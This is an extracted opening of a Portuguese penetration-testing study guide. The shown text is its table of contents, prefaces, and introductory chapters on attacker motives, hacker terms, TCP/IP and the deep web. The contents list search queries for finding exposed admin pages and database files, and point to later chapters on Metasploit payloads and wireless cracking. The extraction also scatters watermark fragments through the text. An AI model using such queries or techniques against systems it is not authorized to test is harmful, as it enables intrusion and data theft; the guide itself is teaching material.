guia_de_estudos_para_analise_de_vulnerabilidades.pdf

ADONEL BEZERRA GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES ...............................................................................................................

www.c

lube

dohac

ker.co

m.br

1


Sumário Prefácio......................................................................................................... 15

Objetivos: ..................................................................................................... 18 ......... 18

O conhecimento não é, e nunca poderá ser considerado como crime! Agradecimentos ............................................................................................ 19 Ataques e fraudes ......................................................................................... 20 12 motivos para um ataque a um sistema computacional ............................21 O que é um hacker? ...................................................................................... 22 Descrição de alguns termos que a internet e a própria imprensa mundial ajudou a criar sobre hacker. .......................................................................... 23 White hat ...................................................................................................... 23 Black hat ....................................................................................................... 23 Script kiddies ................................................................................................ 23 Phreakers ........................................................................ ..............................23 Carders.......................................................................................................... 24 Crackers ........................................................................................................ 24 Hacktivistes .................................................................... ..............................24 Quem são os analistas de vulnerabilidades? ................................................. 24 As 04 Observações mais importantes antes de contratar uma analise de vulnerabilidades ............................................................................................ 25 Introdução ao funcionamento da internet ..................................................... 26 Os protocolos de comunicação ..................................................................... 27 Protocolos Internet (TCP/IP) ........................................................................ 27 Técnicas utilizadas para roubo de dados ......................................................31

www.c

lube

dohac

ker.co

m.br

2


Quais riscos se tentam evitar com uma analise de vulnerabilidades? .......... 32 Erros cometidos pelos usuários finais e profissionais descuidados .............. 32 Acesso a conteúdos impróprios ou ofensivos ............................................... 32 Contato com pessoas mal-intencionadas ...................................................... 32 Sequestro de identidade ................................................................................ 33 Furto e perda de dados .................................................................................. 33 Invasão de privacidade .................................................................................33 Divulgação de boatos ................................................................................... 33 Dificuldade de exclusão ............................................................................... 34 Dificuldade de detectar e expressar sentimentos .......................................... 34 Dificuldade de manter sigilo ........................................................................ 34 Pharming ...................................................................................................... 39 Golpes de comércio eletrônico ..................................................................... 39 Golpe envolvendo sites de compras coletivas: ............................................. 40 Exploração de vulnerabilidades .................................................................... 41 Navegando pela superfície da Web .............................................................. 45 A lógica booleana ......................................................................................... 47 AND ............................................................................................................. 47 OR ................................................................................................................ 48 NOT (-) ......................................................................................................... 48 ASPAS (“ ”) ................................................................................................. 48

Outros delimitadores de busca ...................................................................... 48 Alguns exemplos de pesquisa ....................................................................... 48

www.c

lube

dohac

ker.co

m.br

3


Intext:clubedohacker ....................................................................................48 

Intitle:adonel ......................................................................................... 49



Inurl:adonel .......................................................................................... 49

site:gov ......................................................................................................... 49 site:org ..........................................................................................................49 site:mil ..........................................................................................................49 Filetype ......................................................................................................... 49 Servindo como scanner................................................................................. 50 Inurl:admin.asp ............................................................................................. 50 Inurl:/login/index.asp ................................................................................... 50 index of ......................................................................................................... 50 *.mdb :com.br "index of ............................................................................... 50 "ftp.txt" :.com.br "index of“: ........................................................................ 50

Navegando pela web profunda ..................................................................... 51 A internet que muitos não veem! .................................................................. 51 Motores de busca .......................................................................................... 52 Vamos acessar alguns sites da deep web para servir como exemplo apenas. Vale ressaltar que nessa camada da Internet não existem somente bandidos, existe muito conteúdo melhor que na superfície inclusive. Vale muito a pena conhecer e explorar essa área. Outra vantagem de você navegar na deep web é o fato de estar sempre atualizado sobre as ações, os planos de ataque etc. Estando navegando constantemente nela você terá maiores chances de agir e defender sua rede, bem com de seus clientes. ..................................................54 Tor Mail ........................................................................................................ 54 The Hidden Wiki .......................................................................................... 55

www.c

lube

dohac

ker.co

m.br

4


Busca por Pessoas - pipl.com/ .......................................................................... 57 Organização de uma análise de vulnerabilidades ......................................... 67 O contrato, parte essencial. ........................................................................... 67 O que dizem as Leis? .................................................................................... 68 Das Infrações e Penalidades ......................................................................... 69 Lei nº 7.102, de 20 de junho de 1983 (DOU de 21/06/1983) ................... 69 Lei nº 8.137, de 27 de dezembro de 1990 (DOU de 28/12/1990) ............ 69 Lei nº 8.159, de 08 de janeiro de 1991 (DOU de 09/01/1991) ................. 69 Lei nº 8.977, de 06 de janeiro de 1995 ..................................................... 69 Lei nº 9.296, de 24 de julho de 1996 ........................................................ 69 Lei nº 9.295, de 19 de julho de 1996 (DOU de 20/07/1996 e retificada em 06/08/1996) .............................................................................................. 73 Lei nº 9.472, de 16 de julho de 1997 (DOU de 17/07/1997) .................... 73 Lei nº 9.610, de 19 de fevereiro de 1998 .................................................. 73 Lei nº 9.609, de 19 de fevereiro de 1998 (DOU de 20/02/1998) .............. 73 Lei nº 9.800, de 26 de maio de 1999 (DOU de 27/05/1999) .................... 73 Lei nº 9.983, de 14 de julho de 2000 (DOU de 17/07/2000) .................... 73 Medida Provisória nº 2.200-2, de 24 de agosto de 2001 (DOU de 27/08/2001) .............................................................................................. 73 Lei nº 10.176, de 11 de janeiro de 2001 (DOU de 12/01/2001) ............... 73 Lei Complementar nº 105, de 10 de janeiro de 2001 (DOU de 11/01/2001)

..................................................................................................................74

Lei nº 10.520, de 17 de julho de 2002 (DOU 18/07/2002) ....................... 74 Lei nº 10.408, de 10 de janeiro de 2002 (DOU de 11/01/2002) ............... 74

www.c

lube

dohac

ker.co

m.br

5


Lei nº 10.753, de 30 de outubro de 2003 (DOU de 31/10/2003) .............. 74 Lei nº 10.740, de 01 de outubro de 2003 (DOU de 02/10/2003) .............. 74 Lei nº 10.664, de 22 de abril de 2003 (DOU de 23/04/2003) ................... 74 Lei nº 10.077, de 30 de dezembro de 2004 (DOU de 31/12/2004) .......... 74 Lei nº 10.973, de 02 de dezembro de 2004 (DOU de 03/12/2004) .......... 75 Lei nº 11.196, de 21 de novembro de 2005 (DOU de 22/11/2005) .......... 75 Lei nº 11.111, de 05 de maio de 2005 (DOU de 06/05/2005) .................. 75 Lei nº 11.419, de 19 de dezembro de 2006 (DOU de 20/12/2006) .......... 75 Lei nº 11.341, de 07 de agosto de 2006 (DOU de 08/08/2006). ............... 75 Lei nº 11.280, de 16 de fevereiro de 2006 (DOU de 17/02/2006) ............ 75 Lei nº 11.484, de 31 de maio de 2007 (DOU de 31/05/2007) .................. 76 Lei nº 11.829, de 25 de novembro de 2008 (DOU de 26/11/2008) .......... 76 Lei nº 11.934, de 05 de maio de 2009 (DOU de 06/05/2009) .................. 79 Lei nº 11.903, de 14 de janeiro de 2009 (DOU de 15/01/2009) ............... 80 Lei nº 11.900, de 08 de janeiro de 2009 (DOU de 09/01/2009) ............... 80 Lei nº 12.249, de 11 de junho de 2010 (DOU de 14/06/2010) ................. 80 Lei nº 12.270, de 24 de junho de 2010 ..................................................... 80 Lei nº 12.258, de 15 de junho de 2010 (DOU de 16/06/2010) ................. 80 Medida Provisória nº 534, de 20 de maio de 2011 (DOU de 23/05/2011) ..................................................................................................................80

Lei nº 12.485, de 12 de maio de 2011 (DOU de 13/05/2011) .................. 80 Lei nº 12.507, de 11 de outubro de 2011 (DOU de 13/10/2011) .............. 81 Lei nº 12.527, de 18 de novembro de 2011 (DOU de 18/11/2011 ........... 81 Lei nº 12.551, de 15 de dezembro de 2011............................................... 81

www.c

lube

dohac

ker.co

m.br

6


Lei nº 12.682, de 09 de julho de 2012 ...................................................... 81 Lei nº 12.686, de 18 de julho de 2012 ...................................................... 81 Lei nº 12.735, de 30 de novembro de 2012 (DOU de 03/12/2012) .......... 82 Lei nº 12.737, de 30 de novembro de 2012 .............................................. 82 Decreto nº 7.962, de 15 de março de 2013 ............................................... 85 Art.187 do CPC ........................................................................... .............88 Objetivo ........................................................................................................90 Acordo de confidencialidade e responsabilidade .........................................90 Padrões ......................................................................................................... 91 Metodologias ................................................................................................ 91 Reconhecimento .............................................................................. .............92 Detalhar todas as atividades .........................................................................92 Tipos de testes ......................................................................... .....................93 Scanning .......................................................................................................93 Sondagem e Mapeamento ......................................................................... 93 Força Bruta ............................................................................................... 94 Análise de Tráfego de Rede ..................................................................... 94 Avaliação de Servidores Web .................................................................. 94 Obtenção de acesso "Invasão" ...................................................................... 94 Manutenção do acesso .................................................................................. 94 Limpeza de rastros ........................................................................................ 95 Documentação .............................................................................................. 95 Apresentação dos resultados e sugestões .....................................................95

www.c

lube

dohac

ker.co

m.br

7


O Backtrack e o Kali Linux .......................................................................... 95 Comandos em Shell Linux ...........................................................................99 Usando o interpretador de comandos ......................................................... 100 Comandos de configuração e consulta de redes ......................................... 105 Alguns comandos úteis ............................................................................... 108

.................................................................................................................... 109

Instalação de programas (pacotes) .............................................................. 110 Compilação de programas .......................................................................... 111

........................................................................................ O que é o Kali Linux? 114 Quais as funcionalidades do Kali Linux? ..................................................... 115

Onde estão as ferramentas no Kali? ...........................................................118 Um pouco de Windows ....................................................................... ........... 120

www.c

lube

dohac

ker.co

m.br

8


Config.sys ............................................................................................... 121 Alguns comandos MS-DOS ................................................................... 123 Controladores de dispositivos instável ................................................... 124 Autoexec.bat ........................................................................................... 126 Principais comandos utilizados no autoexec.bat .................................... 127 IO.SYS ................................................................................................... 128 Parâmetros do Config.sys incorporadas ao IO.SYS ............................... 129 COMMAND.COM ................................................................................. 130 Como acessar o MS-DOS ........................................................................... 130 O que é o registro no Windows? ............................................................132 Origens do registro ...................................................................... ........... 132 Arquivos do registro no Windows .......................................................... 133 Navegando pelo registro ......................................................................... 134 O Registro nas versões de 64 bits do Windows, .....................................138 Ferramentas para edição do registro ....................................................... 139 Alguns comandos para execução de tarefas via prompt cmd.exe .......... 140 Comandos de rede no Windows ............................................................. 145 Comando úteis para serem executados via executar ..............................146 Windows PowerShell .....................................................................................196 Conceitos básicos do Windows PowerShell ................................................... 197 A PILHA TCP/IP ........................................................................................... 201 Diferença entre o protocolo TCP e UDP .................................................... 202 Serviços de Rede - Configurando uma rede ................................................... 206

www.c

lube

dohac

ker.co

m.br

9


Comandos do TELNET .................................................................................. 208 Comandos do TELNET e FTP ....................................................................... 210 Comandos para conexão via SSH .................................................................. 211 Um pouco mais sobre os pacotes em rede ...................................................... 212 Analisador de protocolos Wireshark .............................................................. 213 Clonando o endereço MAC ............................................................................ 218 As Ferramentas do Backtrack Linux e Kali................................................ 220 Introdução ao NMAP ................................................................................. 222 Fundamentos do escaneamento de portas ................................................... 224 Os seis estados de porta reconhecidos pelo Nmap ..................................... 225 Comunicação TCP ...................................................................................... 226 Ex: Three Way Handshake ......................................................................... 227 Conexão estabelecida .................................................................................227 Técnicas de varredura com Nmap .............................................................. 227 Alguns exemplos práticos........................................................................... 230 Traceroute com nmap ................................................................................. 234 Exame de lista: -sL ................................................................................... .. 236 Exame por ping com nmap: -sP .................................................................. 237 Técnicas de descobertas de hosts ............................................................... 238 Ping por TCP SYN (-PS) ................................................. 240 Ping por TCP ACK: -PA + ............................................. 241 Ping de UDP (-PU
www .cl ube doh acke

r.c om .br

10


Ping de protocolo IP ( -PO ........................................244 Mecanismo de scripts do nmap .................................................................245 As categorias de scripts ..............................................................................245 Lista de scripts ............................................................................................ 251 TCPDump ................................................................................................... 341 Metasploit Framework ............................................................................... 344 Comandos úteis no metasploit .................................................................... 345 Praticando com o Metasploit. ..................................................................... 348 Invadindo com exploit ................................................................................ 350 Ataque do lado do cliente! .......................................................................... 363 Gerando um VBScript e injetando a carga "payload" ............................... 366 Armitage ..................................................................................................... 377 httsquash ..................................................................................................... 381 netifera ........................................................................................................ 382 Protocolo SCTP .......................................................................................... 383 O Sctpscan. ..................................................................................................... 387 testssl.sh ...................................................................................................... 390 hexinject ..................................................................................................... 391 #./hexinject -s eth0 ..................................................................................... 394 tcpreplay ..................................................................................................... 394 Asp-auditor ................................................................................................. 397 DarkmySqli ................................................................................................ 398 Joomscan ................................................................................. ...................400


r.c om .br

11


Plecost ........................................................................................................ 401 Untidy ......................................................................................................... 403 #./WebSlayer.py ......................................................................................... 405

Essa é a tela inicial dentro do diretório e você pode executá-lo com o........... comando ./WebSlayer.py .................................................................................... 405 DirBuster ................................................................................. ...................408 OWASP Mantra ......................................................................................... 410 #./OWASP\ Mantra ....................................................................................411 Powerfuzzer ................................................................................................ 414 Trabalhando com o Powerfuzzer ................................................................ 415 #./powerfuzzer.py ....................................................................................... 416 Configurando um proxy no Powerfuzzer ................................................... 418 # ./w3af ...................................................................................................... 419

Grendel scan ............................................................................................... 425 #./grendel.sh ............................................................................................... 426 Beef ............................................................................................................ 428 BurpSuite .................................................................................................... 435 Fimap .......................................................................................................... 439 Dradis Framework ...................................................................................... 440 Ataque a redes wireless ..............................................................................445 Padrões wifi ................................................................................................ 447 Autenticação e autorização ......................................................................... 448 Modo Monitor ............................................................................................ 449 Ferramentas para auditoria em Wireless ....................................................450


r.c om .br

12


Airmon-ng ...................................................................... ............................451 Airodump-ng ..............................................................................................451 Aireplay-ng ................................................................................................. 456 Modo filtro ................................................................................................. 457 Modo replay: .............................................................................................. 457 Modo ataque: .............................................................................................. 458 Opções do ataque Fakeauth: ....................................................................... 458 Airbase-ng ...................................................................... ............................459 Aircrack-ng ................................................................................................. 460 Airdecap-ng ................................................................................................ 461 Passos para um ataque a uma rede wireless ...............................................462 Conhecendo melhor e praticando com o macchanger ........................... 466 Organizando um ataque em infraestrutura wireless ...................................466 airmon-ng ................................................................................................... 467 Praticando com o airodump ........................................................................ 468 Quebrar a senha com o aircrack .................................................................469 Wifitap ........................................................................................................ 474 ~# wifitap.py .............................................................................................. 475 Auditando senhas com o John The Ripper ................................................. 477 Criando wordlist ......................................................................................... 480 Bibliográfica ................................................................................................... 481


r.c om .br

13


Todos os direitos para a lingua portuguesa reservados por Adonel Bezerra De acordo com a Lei 9.610, de 19/2/1998, nenhuma parte desta obra poderá ser reproduzida. transmitida e gravada, por qualquer meio eletrônico, mecânico, por fotocópia e outros, sem a prévia autorização, por escrito do autor.

Autor: Adonel Bezerra Editor: Adonel Bezerra Capa: Roberto Mendes de Lima Diagramação: Adonel Bezerra Assistente Editorial: Stefany Miranda

Diversas Marcas Registradas aparecem no decorrer dessa obra. Mais do que simplesmente listar tais nomes e informar quem possui seus direitos de exploração, ou ainda imprimir os logotipos das mesmas, o editor declara estar utilizando tais nomes apenas para fins editoriais, em beneficio exclusivo do dono da Marca Registrada, sem intenção de infringir as regras de sua utilização. Qualquer semelhança em nomes próprios e acontecimentos será mera coincidência.


r.c om .br

14


Prefácio

Este livro é uma sólida construção sobre o tema análise de vulnerabilidades. Seja pelo seu aspecto didático como se apresenta ou ainda pelo seu aspecto técnico relevante. Aborda elementos essenciais relacionados vulnerabilidades em redes e sistemas. Em um primeiro plano, temas importantes como protocolos de comunicação, pilha TCP/IP, web profunda são esclarecidos pelo autor. A partir deste ponto, é traçado um roteiro de organização para uma análise de vulnerabilidade que representa boas práticas para o processo de identificação de fragilidades, falha e potenciais ameaças em redes e sistemas. Consolidados os conteúdos iniciais, o leitor terá acesso ao Backtrack, ao Kali Linux e o seu poderoso arsenal de ferramentas reunidos em um único ambiente. Assim, soluções como Metasploit e Nmap estão integradas ao BackTrack e ao Kali Linux como uma forma de agilizar o trabalho de profissionais da área de redes de computadores bem como todos aqueles que desejam adquirir conhecimentos sobre análise de vulnerabilidades de uma forma prática, produtiva e objetiva. Neste contexto, não é demais argumentar que profissionais que dominam esse conhecimento são cada vez mais requisitados por


r.c om .br

15


empresas interessadas em manter uma intensa colaboração entre analistas de vulnerabilidade e suas equipes que atuam no processo de desenvolvimento de sistemas. Pois, assim, a empresa estará atuando de forma preventiva ao submeter seus sistemas, antes de serem colocados em ambiente de produção, a rigorosos testes de vulnerabilidades. Enfim, esperamos que o texto seja útil e sirva como motivação para estudos cada vez mais aprofundados sobre o tema.

Prof. Antonio Eduardo Rocha Lobo Especialista em Processamento da Informação


r.c om .br

16


Aprenda com quem faz. Esse sempre foi o lema dos cursos, workshops e palestras ministrados pelo professor Adonel Bezerra por todo o Brasil. Os milhares de alunos que tiveram a oportunidade de participar de um dos seus treinamentos sabem da maneira simples, objetiva e didática que o autor consegue expor e ensinar os temas abordados, sejam dos mais simples aos mais complexos. A paixão pela sala de aula, a experiência acumulada em quase 20 anos dentro dos laboratórios de informática, o engajamento nos movimentos de softwares livres, o pioneirismo na difusão da filosofia do hacker ético através do seu portal Clube do Hacker, tornam o autor um profissional completo e uma das maiores autoridades no setor de segurança da informação do país. Como colega do autor, profissional da área de tecnologia da informação e advogado focado nas causas de direito digital, tive a honra de ser convidado a escrever o prefácio deste livro. Esta obra é um divisor de águas onde o leitor vai aprender passoa-passo como identificar, analisar, explorar e defender a rede de computadores que administra. O que era guardado a sete chaves pelos profissionais mais experientes da área e ninguém ensinava agora está revelado neste livro. Aliás, transmitir o conhecimento de forma plena e sem censura sempre foi o diferencial dos treinamentos do professor Adonel Bezerra, um verdadeiro Mister M dos hackers. Para construir o conhecimento de forma sistêmica as redes serão balançadas, os motores da internet serão destrinchados, o submundo será exposto. Tudo isso para você se tornar um verdadeiro Analista de Vulnerabilidade. Peterson Motta OAB-AM 7051 [email protected]


r.c om .br

17


Objetivos: Considero como conclusa essa obra se ao final dela você conseguir fazer uma boa analise de vulnerabilidades em sua rede, sistema computacional ou mesmo em seu site. Esse projeto visa ser um guia acessível a todos que desejam aprender a profissão de analista de vulnerabilidades em sistemas e redes; Creio que assim, poderemos afirmar que estamos cumprindo com nosso papel sem sair da proposta de nosso site www.clubedohacker.com.br que é levar informações de qualidade a todos os cantos e ajudar, mesmo que de forma modesta na democratização e segurança da informação.

O conhecimento não é, e nunca poderá ser considerado como crime! Conhecer as ferramentas existentes, aprender invasão de sistemas computacionais para testes de vulnerabilidades, desde que com as devidas autorizações não é crime e o colocará em vantagens no mercado, pois os profissionais que detém tal conhecimento têm sido cada vez mais requisitados pelas empresas de todos os setores. São esses profissionais que tem colaborado efetivamente com as outras equipes, agindo de forma proativa, pois antes de os sistemas serem


r.c om .br

18


colocados em ambiente de produção já passaram por diversos testes de vulnerabilidades, os mais diversos ataques, tentativas de invasão etc. Nós sabemos que não existe segurança 100%, mais podemos minimizar e muito os riscos de ter nossos sistemas invadidos por terceiros se fizermos uma boa analise de vulnerabilidades antes de coloca-los em ambiente de produção.

Agradecimentos Eu jamais conseguiria fazer qualquer coisa em minha vida sem a colaboração de terceiros, seja um amigo, um colega de trabalho, um aluno, professor enfim. Se eu viver mais de uma vida, jamais perderei a oportunidade de agradecer a vocês por existirem em minha vida. Agradeço a Deus todos os dias por estar vivo para presenciar e desfrutar da companhia de tantas pessoas que ele tem me apresentado. Mais algumas pessoas se destacam e iluminam nossas vidas, mesmo que estejam distantes. Agradeço ao Prof. Raphael meu professor no curso de direito, ainda me recordo de suas lições no 1.o período e pode ter certeza que me foram de grande valia.


r.c om .br

19


Aos meus alunos do curso de analista de vulnerabilidades em sistemas e redes que continuam me cobrando cada vez mais conhecimento, mesmo sem dizer uma única palavra eu sinto que eles querem sempre mais e a busca não para nunca. A Stefany Miranda por me aturar como colega de trabalho na Academia Linux, Clube do Hacker e Seclinux e por ter me ajudado na revisão dessa obra. A Sana Cavalcante por ser uma pessoa como poucas, dentre às milhares de pessoas que já conheci. A minha família que eu amo!

Ataques e fraudes Qualquer computador conectado a uma rede é potencialmente vulnerável a um ou vários ataques. Para efeitos de abordagem nessa obra, um “ataque" pode ser entendido como a exploração de determinada falha em um sistema de informática para fins não conhecidos pelo administrador dos sistemas e na maioria dos casos termina em prejuízos para os mantenedores e ou proprietários. Na Internet, os ataques acontecem permanentemente na ordem de milhares de por minuto sobre os milhões de máquinas conectadas a rede mundial.


r.c om .br

20


Estes ataques são, em maior parte, lançados automaticamente a partir de máquinas infectadas por softwares de controle remoto, sem que seu proprietário tenha qualquer conhecimento sobre o fato. Para enfrentar estes ataques é indispensável conhecer os seus sistemas, os principais tipos de ataques e aprender a utilizá-los, pois só assim você estará apto a agir proativamente lutando em igualdade de condições no mesmo campo do que podemos chamar aqui de, seu inimigo oculto.

12 motivos para um ataque a um sistema computacional Porque alguém dispara um ataque a determinado sistema computacional ou mesmo a milhares de sistemas espalhados em redor da terra e conectados a rede mundial de computadores? Na maioria das vezes esses ataques tem o objetivo de: Roubar informações, como segredos industriais ou propriedade intelectual; Roubar informações pessoais de determinado usuário para uso 2. ilícito; Roubar dados bancários; 3. Derrubar um serviço em execução no sistema com o objetivo de 4. prejudicar os negócios ou mesmo por represália; 1.

5.

Utilizar o sistema do usuário como “salto” para um ataque maior

a6. outros sistemas computacionais; Vandalismo, com o objetivo de ganhar fama nos grupos, fóruns etc. Roubo de sessão (sessão hijacking), para crimes financeiros ou 7. para descobrir segredos de terceiros; Sequestro de identidade; 8.


r.c om .br

21


Desvio ou alteração de mensagens para prejudicar o usuário real; Roubo de dados sigilosos através de keylogger físico ou programas de captura de teclas etc. 11. Exploração de vulnerabilidade dos "softwares" servidores desatualizados ou mantidos sem as devidas proteções; 12. Varrimento das portas, com o objetivo de descobrir versões de serviços a aplicações em uso. 9. 10.

Daí a necessidade de se fazer uma boa analise de vulnerabilidades com o objetivo de detectar possíveis falhas que permitam exploração e acesso não autorizado. Assim poderemos corrigir os problemas de configurações inadequadas, serviços desnecessários que foram habilitados automaticamente nas instalações, falhas de softwares e demais problemas encontrados, agindo de forma proativa.

O que é um hacker? O termo “hacker” é utilizado frequentemente para designar um pirata

de computador. Confesso que já estou cheio desse palavreado de o que é um hacker ou isso ou aquilo. Uma resposta à impressa e a todos aqueles que gostam de criar símbolos: um hacker pode até vir a cometer crimes um dia. Conhecimento pra isso ele tem! Mas um criminoso jamais será um hacker.


r.c om .br

22


Descrição de alguns termos que a internet e a própria imprensa mundial ajudou a criar sobre hacker. O termo hacker já existe desde antes dos anos 50, era utilizado de forma positiva para homenagear os programadores eméritos, serviu durante os anos 70, para descrever os revolucionários da informática, que na sua maior parte se tornaram os fundadores das maiores empresas de informática do mundo etc. Hoje, esta palavra é frequentemente utilizada sem nenhuma razão, para designar as pessoas que invadem os sistemas de informática para roubar dados e cometer atos ilícitos.

White hat: Hackers no sentido nobre do termo, cujo objetivo é ajudar à melhoria dos sistemas e tecnologias, estão geralmente na srcem dos principais protocolos e instrumentos informáticos que utilizamos hoje em dia. Black hat: Mais correntemente chamados piratas ou pessoas que se introduzem nos sistemas informáticos com um objetivo prejudicial, de forma criminosa em alguns países onde tem legislação especificas para crimes digitais, (Para que haja um crime, é necessário que exista uma Lei que o tipifique. No caso do Brasil nós temos a Lei 12.737 e outras que será objeto de estudo no capitulo 02). Script kiddies: São considerados como os novatos, usuários da rede que utilizam programas encontrados na Internet, geralmente detém conhecimentos limitados e passam o tempo varrendo os sistemas de informática a fim de se divertirem. Phreakers: São denominados de piratas de telefonia que se interessam pela rede telefônica, normalmente gostam de fazer grampos e podem


r.c om .br

23


trabalhar na aquisição de segredos industriais e comerciais, investigações de adultérios ou outras investigações ilegais etc.

Carders: Se interessam principalmente por cartão, principalmente os cartões bancários e cartões de crédito, normalmente utilizam-se de programas de captura de dados para extrair dos computadores e gravar em bases de dados remotas e utiliza-los posteriormente para fazer compras até saques. Crackers: Programadores, cujo objetivo é criar software que permitem atacar sistemas de informática ou quebrar proteções contra a cópia dos softwares pagos (Um crack, pode ser entendido como um programa executável, encarregado de alterar determinado software srcinal e quebrar as proteções). Hacktivistes: São hackers cuja motivação é essencialmente ideológica, atacam sites governamentais e de grandes corporações e adoram estar na mídia (normalmente se organizam em grupos geograficamente distribuídos). Não irei mais me alongar nesse assunto. Pois já está demasiadamente difundido no ceio da sociedade. Citei nessa obra apenas com o objetivo de manifestar minha opinião sobre o tema. Coisa que já faço a mais de duas décadas seja através do meu site ou mesmo através da imprensa.

Quem são os analistas de vulnerabilidades? Os analistas de vulnerabilidades são profissionais com bastante conhecimento da matéria, normalmente profissionais oriundos de redes ou programação, são profissionais que normalmente trabalham com a responsabilidade de apontar falhas nos sistemas computacionais, são incansáveis em sua tarefa e procuram estar atento a tudo que acontece na


r.c om .br

24


rede, ele é capaz de detectar falhas em sistemas e redes agindo proativamente e procurando manter as equipes de suporte sempre atualizadas e alerta no que se refere a falhas de projeto, configuração, desenvolvimento e implementação.

As 04 Observações mais importantes antes de contratar uma analise de vulnerabilidades Uma analise de vulnerabilidades "Teste de invasão" é uma prática de valor inestimável para todas as organizações, sejam publicas ou privadas, bem antes de ser colocado qualquer sistema computacional em ambiente de produção. Agindo assim, pode-se terá certeza da capacidade de resistência de tais sistemas a um ataque externo ou interno. Mais como contratar uma empresa ou profissional para um trabalho tão sério? Sabendo que você poderá expor os dados da companhia a terceiros! É importante adotar alguns critérios, já que esse tipo de profissional não se contrata através de anúncio na imprensa.  





Deve-se avaliar adotando os mais rígidos critérios; Avaliar o tipo de mídia que a empresa se utiliza para divulgar seus serviços, sempre que possível deve-se fugir do sensacionalismo exagerado, nem sempre quem investe mais em mídia tem a melhor solução; Contratar sob CLT tem sido uma boa prática, procura se identificar na própria equipe de TI algum profissional com tal perfil e investir em cursos livres para ter o melhor analista de vulnerabilidades dentro da organização com exclusividade; A contratação de pessoa física deve ser evitada sempre que possível, mais se o projeto é pequeno e tem orçamento apertado pode-se procurar um profissional especialista nessa área e que


r.c om .br

25


prestará tal serviço, nesse caso os critérios de avaliação devem ser mais rigorosos.

Introdução ao funcionamento da internet A Internet é uma rede mundial de computadores que utilizam um conjunto de protocolos de rede (a pilha TCP/IP). Uma rede de computadores é um conjunto de dois ou mais computadores onde a partir de um meio de comunicação é possível trocar informações entre eles através de acesso ao meio de comunicação. (Informações sobre toda essa pilha pode ser encontra em: http://www.rfc-editor.org/). Existem diversos meios de comunicação e são classificados como meio de comunicação guiados (ex: fios de cobre, fibra ótica) e meio de comunicação não guiados (ex: ondas de rádio, micro-ondas etc.) É possível acessar a Internet utilizando qualquer desses meios, desde que, utilizem-se dos protocolos adequados. A infraestrutura física da Internet é composta por cabos de fibra-ótica em backbones intercontinentais e satélites, assim, para se conectar a Internet, basta ter acesso à rede telefônica publica cabos ou comunicação sem fio interligado a um provedor de acesso que ira fazer a ponte entre uma maquina em qualquer local do mundo e a rede mundial de computadores.


r.c om .br

26


Os protocolos de comunicação Para que dois ou mais computadores se comuniquem, é necessário que se utilizem dos mesmos protocolos de comunicação, esta linguagem deve ser de compreensão de todos. Na Internet, o protocolo padrão utilizado pelas máquinas é composto por uma pilha de vários protocolos, cada um responsável por serviços distintos "o TCP/IP", que teve srcem na década de 70 e nos anos 80 tornou-se o protocolo padrão. O TCP/IP define uma pilha de camadas de comunicação, cada uma com um protocolo próprio, a saber:

Protocolos Internet (TCP/IP) Camada Serviços dispoíveis 1 – Física, ou Essa camada é conhecida como camada física por Acesso à internet. ter a responsabilidade de trata-se das tecnologias usadas para conexões, por exemplo: Ethernet, WiFi,Modem, etc. 2 - Rede Camada responsável pelas conexões entre as redes locais, estabelecendo assim a interconexão. 3 - Transporte Controla a comunicação host-a-host. 4 - Aplicação Contém todos os protocolos (TCP e UDP HTTP, HTTPS, FTP, DNS, RTP etc.) Para serviços específicos de comunicação de dados em um nível de processo-a-processo (por exemplo: Ela especifica como browser deve se comunicar com um servidor da web etc.).


r.c om .br

27


Mas a camada que mais interessa aos usuários é a camada de aplicação, onde milhares de pessoas ao redor do planeta utilizam o protocolo HTTP para navegar em páginas e mais páginas em HTML. O Modelo de referência TCP/IP é dividido pelas camadas de: Aplicação; Transporte; rede; Física/Host, onde o HTTP é um dos protocolos mais utilizados na camada de aplicação e é o protocolo responsável pela grande popularização da Internet devido a sua funcionalidade. Os passos para a comunicação via internet segue um roteiro pré-determinado, onde; 1 - O usuário abre o navegador em seu computador, e digita um endereço de uma página ex: www.clubedohacker.com.br; 2 - A requisição do endereço é passada da camada de aplicação à camada de Física/Host transformando em impulsos de acordo com o meio de comunicação. 3 - Ao chegar ao servidor do provedor, a requisição sobe todas as camadas até a camada responsável por processar a informação ou repassar para qualquer outra maquina da Internet; 4 - A maquina para qual se destina a requisição finalmente processa esta solicitação e envia no caminho inverso os dados do objeto solicitado "www.clubedohacker.com.br".


r.c om .br

28


5 - Ao receber os dados da pagina que solicitou, o navegador do cliente interpreta as informações e começa a exibir a pagina na tela do computador.

Tecnicamente isso é bem simples; o grande problema é por onde passam os dados dos usuários, quem mantém a infraestrutura de segurança para tais dados, considerando que a Internet está presente na rotina da maioria da população mundial e para essas pessoas seria muito difícil viver sem a utilização da internet, isso é perfeitamente compreensivo devido às facilidades nas comunicações, a redução de custos e muitas outras razões que facilitam o dia a dia. Pois através da Internet nós podemos encontrar antigos amigos, fazer novas amizades, encontrar pessoas que compartilham das mesmas opiniões,


r.c om .br

29


encontrar amigos e familiares distantes, ler jornais, fazer operações bancárias, utilizar os serviços oficiais como tirar uma certidão negativa, cadastro para passaporte, compras dos mais diversos produtos e muito mais. Além de todo o conteúdo que todos nós estamos acostumados a encontrar através dos motores de busca como google, yahoo e outros, existem também o que nós chamamos de Web Profunda “Deep Web”

Imagem extraída da internet (http://pt.wikipedia.org/wiki/Deep_web) Que é basicamente uma parte mais profunda da internet e que nossos


r.c om .br

30


motores de busca tradicionais não podem indexar, o que torna quase invisível ou inacessível para quem não sabe que existe. Estima-se que a web profunda é mais de 500 vezes maior que o conteúdo da superfície. É nessa parte da rede que reside o que chamamos de submundo da Web, Exageros a parte, é claro que não são somente pedófilos, quadrilhas e terroristas que utilizam a web profunda. Existem cientistas universidades, polícias, especialistas em TI, hackers e muitos outros profissionais com conhecimento acima da média que veem todo esse conteúdo. Ha inclusive empresas especializados em Deep Web. A grande pergunta hoje é como navegar, utilizar todos esses serviços com segurança ou ao menos com o mínimo de segurança necessários para que os dados essenciais como CPF RG números de cartão de credito, dados de conta bancária dos internautas não sejam sequestrados na rede?

Técnicas utilizadas para roubo de dados Quais são as técnicas utilizadas para roubar dados de pessoas e empresas, como são usadas, quais ferramentas, como saber se estamos vulneráveis? São essas perguntas que tentarei responder nessa obra e para isso irei utilizar dos conhecimentos de mais de duas décadas de experiência


r.c om .br

31


em analise de vulnerabilidades para descrever todos os passos do inicio ao fim.

